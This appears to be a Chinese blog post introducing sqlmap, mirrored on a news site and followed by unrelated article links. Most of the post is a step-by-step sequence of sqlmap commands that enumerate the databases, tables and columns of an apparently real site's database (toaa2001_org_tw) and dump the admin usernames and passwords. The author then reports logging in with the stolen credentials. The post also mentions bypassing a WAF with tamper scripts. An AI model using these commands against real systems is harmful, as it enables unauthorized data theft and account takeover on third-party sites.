当前位置: 首页 > news >正文

sqlmap使用入门

sqlmap加速了sql注入的发展,需要掌握6点,其一是--dbs获得数据库名称,其二是-D 数据库名称 --tables 获得数据库中的所有表名,其三是-D 数据库名 -T 表名 -C 字段1,字段2 --dump 获得数据库中的表中的字段的值,其四是-r POST请求.txt针对POST请求进行sql注入,其五是已知数据库用--dbms MYSQL进行漏洞探测,其六是使用--tamper变形载核绕过WAF。ailx10 预祝大家:2023护网取得好成绩~

ailx10

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

sqlmap注入,获得数据库名称(--dbs

sqlmap -u "https://****" --dbs

sqlmap注入,获得数据库中的所有表名(-D 数据库名称 --tables

sqlmap -u "https://***" -D toaa2001_org_tw --tables

sqlmap注入,获得数据库中的表中的所有字段(-D 数据库名 -T 表名 --columns

sqlmap -u "https://***" -D toaa2001_org_tw -T admin --columns

sqlmap注入,获得数据库中的表中的字段的值(-D 数据库名 -T 表名 -C 字段1,字段2 --dump

sqlmap -u "https://***" -D toaa2001_org_tw -T admin -C A_Pass,A_User --dump

使用账号和密码登录网站

登录网站成功,sqlmap就是这么朴实无华,且枯燥

已开启送礼物

相关文章:

  • Matlab 列车纵向滑模二阶自抗扰算法和PID对比
  • Spring Cache的详细使用
  • 网张实验操作-防火墙+NAT
  • AI赋能安全生产,推进数智化转型的智慧油站开源了。
  • 【Pandas】pandas DataFrame cov
  • n8n 修改或者智能体用文档知识库创建pdf
  • 类和对象(1)--《Hello C++ Wrold!》(3)--(C/C++)
  • web 自动化之 Unittest 应用:报告装饰器断言
  • 【C++重载操作符与转换】构造函数和复制控制
  • CSS-PureCss样式开发
  • 神经网络是如何工作的
  • 采用AI神经网络降噪算法的通信语音降噪(ENC)模组性能测试和应用
  • 迅为RK3568开发板内核模块实现-编译模块
  • 查看购物车
  • 透视相机:创意摄影新体验,解锁照片无限可能
  • 几何_平面方程表示_点+向量形式
  • python二手书交易管理系统
  • 直方图特征结合 ** 支持向量机图片分类
  • 如何在通义灵码里使用 MCP 能力?
  • 香港维尔利健康科技集团亮相中国资本市场发展年会,被评为“最具投资价值医疗科技企业”
  • 60余年产业积累,“江苏绿心”金湖炼就“超级石油工具箱”
  • 美国政府信用卡被设1美元限额,10美元采购花一两小时填表
  • 汇源果汁发文:经营情况一切正常
  • 德国将不再公布对乌克兰军事支持的细节
  • 李在明正式登记参选下届韩国总统
  • 习近平会见委内瑞拉总统马杜罗